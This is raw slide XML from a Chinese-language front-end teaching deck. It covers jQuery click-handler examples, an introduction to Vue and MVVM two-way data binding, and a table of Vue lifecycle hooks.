            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>      // alert("dashu");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>     $("div").show();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>     // $("div").slideDown(300);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    });</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   $("#btn2").click(function(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    $("div").text("我是内容");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   });</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  });&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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VUE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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文本占位符 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604107" y="5188787"/>
            <a:ext cx="3704877" cy="496496"/>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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>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lgn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>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lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MVVM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：可以实现数据的双向绑定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="782320" y="3873559"/>
            <a:ext cx="5071038" cy="2630457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="782320" y="1654698"/>
            <a:ext cx="10526664" cy="2083584"/>
            <a:chOff x="782320" y="1654698"/>
            <a:chExt cx="10526664" cy="2083584"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9629141" y="2007451"/>
              <a:ext cx="1497075" cy="1303209"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="组合 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="782320" y="1654698"/>
              <a:ext cx="10526664" cy="2083584"/>
              <a:chOff x="920209" y="1823315"/>
              <a:chExt cx="10322211" cy="2083584"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="矩形: 对角圆角 16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823316"/>
                <a:ext cx="10322211" cy="2083583"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 6871"/>
                  <a:gd name="adj2" fmla="val 6533"/>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40000" bIns="180000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045"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Vue </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是一套</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前端框架</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，免除原生</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JavaScript</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中的</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DOM</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操作，简化书写。</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lvl="1"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基于</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN"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MVVM</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(Model-View-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="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ViewModel</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思想，实现数据的</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="16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双向绑定</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，将编程的关注点放在数据上。</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lvl="1"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官网：</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hlinkClick r:id="rId3"/>
                  </a:rPr>
                  <a:t>https://v2.cn.vuejs.org/</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN"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矩形: 对角圆角 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920211" y="1823315"/>
                <a:ext cx="1105942" cy="431493"/>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4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Vue</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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9" name="Shape 2706"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="926054" y="1731128"/>
              <a:ext cx="279459" cy="27863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mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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righ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01</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>基础</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文本占位符 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299401" y="1838854"/>
            <a:ext cx="9676703" cy="880536"/>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200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>生命周期：指一个对象从创建到销毁的整个过程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>生命周期的八个阶段：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>每触发一个生命周期事件，会自动执行一个生命周期方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>钩子方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278961" y="1540039"/>
            <a:ext cx="10749599"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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>生命周期</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1161907" y="5553071"/>
            <a:ext cx="9485220" cy="987552"/>
            <a:chOff x="1353390" y="5476905"/>
            <a:chExt cx="9485220" cy="987552"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3632511" y="5670680"/>
              <a:ext cx="798536" cy="695128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5600582" y="5669790"/>
              <a:ext cx="798536" cy="695128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="组合 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9684364" y="5668899"/>
              <a:ext cx="798537" cy="695130"/>
              <a:chOff x="8534402" y="2543781"/>
              <a:chExt cx="2333954" cy="2031715"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="图片 17"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId1"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8534402" y="2543784"/>
                <a:ext cx="2333951" cy="2031712"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="图片 18"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8534405" y="2543781"/>
                <a:ext cx="2333951" cy="2029108"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7894122" y="5676007"/>
              <a:ext cx="798536" cy="695128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="组合 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1664440" y="5669790"/>
              <a:ext cx="798536" cy="694237"/>
              <a:chOff x="662988" y="2571214"/>
              <a:chExt cx="2333951" cy="2029108"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="16" name="图片 15"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId1"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="736140" y="2571214"/>
                <a:ext cx="2256901" cy="1964639"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="图片 16"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="662988" y="2571214"/>
                <a:ext cx="2333951" cy="2029108"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="箭头: 虚尾 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2648475" y="5864240"/>
              <a:ext cx="798536" cy="283279"/>
            </a:xfrm>
            <a:prstGeom prst="stripedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 156217"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                    <a:tint val="66000"/>
                    <a:satMod val="160000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                    <a:tint val="44500"/>
                    <a:satMod val="160000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="2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虚尾 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4619708" y="5864239"/>
              <a:ext cx="798536" cy="283279"/>
            </a:xfrm>
            <a:prstGeom prst="stripedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 156217"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                    <a:tint val="66000"/>
                    <a:satMod val="160000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                    <a:tint val="44500"/>
                    <a:satMod val="160000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="2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虚尾 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8885827" y="5864238"/>
              <a:ext cx="798536" cy="283279"/>
            </a:xfrm>
            <a:prstGeom prst="stripedRightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 156217"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                    <a:tint val="66000"/>
                    <a:satMod val="160000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                    <a:tint val="44500"/>
                    <a:satMod val="160000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="2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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1353390" y="5476905"/>
              <a:ext cx="9485220" cy="987552"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 6522"/>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stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6710168" y="5856371"/>
              <a:ext cx="830652" cy="228620"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="表格 19"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1161906" y="2541431"/>
          <a:ext cx="9485219" cy="2967764"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{21E4AEA4-8DFA-4A89-87EB-49C32662AFE0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2662748"/>
                <a:gridCol w="6822471"/>
              </a:tblGrid>
              <a:tr h="403860">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                        <a:t>状态</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="00B0F0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                        <a:t>阶段周期</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="00B0F0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="320488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="85000"/>
                              <a:lumOff val="15000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>beforeCreate</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:lumMod val="85000"/>
                            <a:lumOff val="15000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcP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创建前</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86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="320488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="85000"/>
                              <a:lumOff val="15000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>created</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:lumMod val="85000"/>
                            <a:lumOff val="15000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ct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创建后</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86034" marR="86034" marT="43015" marB="43015" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="320488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="85000"/>
                              <a:lumOff val="15000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>beforeMount</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:lumMod val="85000"/>
                            <a:lumOff val="15000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcP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载入前</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86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="320488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>mounted</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="130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挂载完成</a:t>
                      </a:r>
